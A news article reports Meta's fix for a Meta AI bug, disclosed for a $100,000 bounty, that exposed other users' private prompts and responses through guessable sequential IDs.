The vulnerability stemmed from the way Meta AI handled editable prompts. Logged-in users could regenerate text and images by editing their original input.
Meta has patched a serious security vulnerability in its AI chatbot platform that allowed users to access private prompts and AI-generated responses from other users, according to a TechCrunch report.
The bug was responsibly disclosed by Sandeep Hodkasia, founder of security testing firm AppSecure, who told TechCrunch he received a $100,000 bug bounty for the discovery.
Hodkasia identified the flaw on December 26, 2024, and Meta deployed a fix nearly a month later, on January 24, 2025. A Meta spokesperson confirmed the issue to TechCrunch, stating that the company "found no evidence of abuse and rewarded the researcher."
The vulnerability stemmed from the way Meta AI handled editable prompts. Logged-in users could regenerate text and images by editing their original input. However, Meta's servers assigned each prompt-response pair a unique, sequential number - one that Hodkasia discovered could be manipulated. By intercepting and altering this number through browser network traffic analysis, he was able to retrieve other users' content without authorization.
“The prompt numbers were easily guessable,” Hodkasia told TechCrunch, warning that malicious actors could have exploited this by using automated tools to scrape user data at scale.
Although Meta confirmed that no exploitation was detected, the incident underscores the ongoing privacy and security challenges tech firms face as they race to roll out generative AI tools.
Meta’s standalone AI app, launched earlier this year to compete with platforms like ChatGPT, had already drawn criticism for privacy mishaps after some users unintentionally shared private conversations publicly.
First Published on
Jul 16, 2025 1:29 PM